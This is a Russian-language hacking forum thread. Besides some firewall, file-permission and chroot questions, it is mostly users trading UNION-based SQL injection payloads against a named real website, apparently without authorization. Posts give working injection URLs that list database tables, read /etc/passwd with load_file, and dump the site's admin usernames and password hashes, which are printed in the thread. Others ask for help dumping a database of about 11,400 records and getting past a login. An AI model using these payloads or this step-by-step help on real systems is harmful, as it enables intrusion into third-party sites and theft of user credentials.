Интересно.А как определить наличие файрволла на FreeBsd/Linux ?Есть какой-нибудь список путей или чего-то подобного ? Другие средства защиты ? Ещё вопрос: Вот на хостинге определенного юзера есть файлы вида: m.png 2.5 KB 04.05.2009 21:51:12 20350/120 -rw-r--r-- Но таких групп в /etc/group и нету!А с системных юзеров типо root,daemon,adm и т.д. файлы можно удалять,хотя шелл говорит о том,что прав я таких не имею.Как это объяснить ?Я не нашёл ни одного иденитфикатора (20350 или 120) в файле групповой политики.Так что же,их не существует вовсе? И как они связаны тогда ? Ничего не понимаю...Встречал кто-нибудь что-либо подобное ? Ещё вопрос: Как сделать так,чтобы при запросе любой папки/файла всё время выдавался ответ 200 ОК. Всегда интересовало,как это у них выходит.
что касается FreeBSD и его файрвола (по умолчанию ipfw), можешь посмотреть в /etc/rc.conf на предмет firewall_enable="YES" в этом же конфиге будет указано где находится скрипт с правилами Что касается linux систем, то такие скрипты правил находятся: /etc/init.d/ rc.firewall, rc.fw и т.п. с вторым вопросом.. не сталкивался, нужно смотреть. по последнему вопросу.. не совсем понял, что имеется ввиду.
ну ты можешь удалять файлы если папка в которой они находятся либо drwxrwxrwx, либо ты работаешь от юзера который является владельцем этой папкой, либо находишься в группе и права на папку у группы rwx. Если всё так то ты можешь удалять любые файлы, хоть они будут руту принадлежать. Однако если на файлах стоит стики бит +S, удалить такой файл может только его владелец по последнему: это скорее всего настройки веб-сервера в .htaccess, либо скриптом. Посмотри, вроде в вордпрессе как то реализована эта фича Вообще это называется soft 404 http://en.wikipedia.org/wiki/404_error
Может быть там симуляция реальной системы внутри подкаталога, т.е. с прогаммой chroot или jail, see chroot
Подставляю -1 union select username,2,3 from my_realmd.account where username=0x416e79626973 limit 1,1-- Не выводит то что в колонке username (именно с where... не выводит почему то)(вывод username поставил для того чтобы убедиться правильно ли where сработал) В чем дело? Правильный ли у меня запрос? (ах да он у меня ошибки не выдает... то есть where username=... сработал!) И еще прежде чем вывести кого то из таблицы я решил найти какой нибуть ник (username колонка) и потом по нему вывести через where ---> все равно не получается Если вместо 0x416e79626973 подставить неверный параметр 00416e79626973 то получается выводит он мне такое: Unknown column '00416e79626973' in 'where clause' sql-inj не могу дать так как хочеться самому все сделать (вы просто мне скажите ошибки которые у меня если они есть)
Ок спасибо! Вот такой еще вопрос... В таблице слишком много колонок! Хотелось бы вывести токо определенные результаты (к примеру от одного до 50) Как это сделать? (и можно ли это вообще сделать)
Если тебе нужно вывести от 1 до 5 колонок СРАЗУ,то limit 1,5 должно помочь )(Мне помогало) Если нужно вывести записи из конкретных строк или колонок,то: 1+union+select+1,2,3,username,password,6-- или так: 1+union+select+1,2,3,concat_ws(разделительв HEX,username,password),5,6 или так: 1+union+select+1,2,3,concat(разделитель,username,разделитель,password,разделитель) Если не ошибаюсь,конечно Это всё работает при MySql. конкретную запись вывести,тогда так: 1+union+select+1,2,3,4,username,6+from+users+limit+x,1, где х - произвольный номер записи в таблице.
diznt,для того,чтобы грамотно выводилось,нужно всегда объединять поля в таблице.У меня тоже иногда косяки случаются.Выводит тебе Ouknown column,потому что MySql не понял,что перед ним хекс данные - и правильно сделал,так как ты убрал 0x,который и отличает hex от oct (типы данных).В некоторых языках программирования можно и 0 ставить спереди,в некоторых необходимо только 0х.Когда ты пишешь спереди 0x(тут_число в HEX),то он понимает,что перед ним HEX данные,и преобразует их обратно.Так как ты передаёшь данные в кавычках,то он преобразует их в строку. Ответ будет аналогичен твоему,если ты подставишь в where username='sasasa'.Ошбка та же.
Сам по себе механизм chroot не полностью безопасен. Если программа, запущенная в chroot имеет привилегии root, она может выполнить second chroot для того, чтобы выбраться наружу. Это работает потому, что некоторые ядра Unix не позволяют правильного вложения контекстов chroot. А как вообще другой пользователь запустит программу с привилегиями root ? Распространяется ли chroot на подкаталоги того каталога,куда установлена система ?
Вот так выводит: http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25,26,27%20FROM%20INFORMATION_SCHEMA.TABLES-- А вот так уже нет: http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25,26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM IT 1,1-- Где грабли?
На сайте есть 2 уязвимых скрипта, но второй доступен только после авторизации на сайте. Я хочу собрать всю инфу из БД через дампер(в базе 11400~ записей) но если выводить через news.php то в хеше, и только в нем, выводятся только последние 8 символов остальные преобразуются в * Вот скрин как выглядит вывод. Прошу помочь либо разобраться как можно авторизоваться на сайте через SIPT, либо подсказать как можно обойти такой вывод..
Code: http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(TABLE_NAME),1,1,1,1,1,2,2,2,2,2,2,2,2+FROM+INFORMATION_SCHEMA.TABLES-- CTRL+A а вообще сдался тебе этот лимит: Code: http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,load_file('/etc/passwd'),1,1,1,1,1,2,2,2,2,2,2,2,2-- или так: Code: http://www.antisocial.be/dotclear/admin/auth.php http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(user_name,user_status,user_pwd),1,1,1,1,1,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--
Пардон, а вот можно с этого момента поподробнее? Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user? И, до кучи... Запрос выводит Code: 12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc656c12e10f083e7edec3364861fe88cb4 Я так понимаю, это закриптованные логин и пасс?
через SIPT никак, в отношении POST запросов он багганый шо писец, сам хотел через него работать. Чуть позже я выложу много-поточный скрипт для вывода через POST запросы.
Сипт может спокойно выводить структуру базы и данные из неё. Fields user_id:user_pwd [0]:admin:2ab240ccb8c845c24b708afc7fc050a83629fb9a [1]:antisocial:d1c35cc656c12e10f083e7edec3364861fe88cb4 Вот что выводит.
попробуй так(но так, выведутся только несколько первых записей) -1' union select 1,2,3,4,group_concat(concat_ws(username,0x3a,sha_pass_hash) separator 0x20), 6 from realmd.account -- -А чтобы остальные вывести, пробуй substring, может прокатить.
Рискуя показаться тупее, чем есть, скажу, что Сипт у меня вообще не находит там дырок. Можешь пошагово расписать свои действия?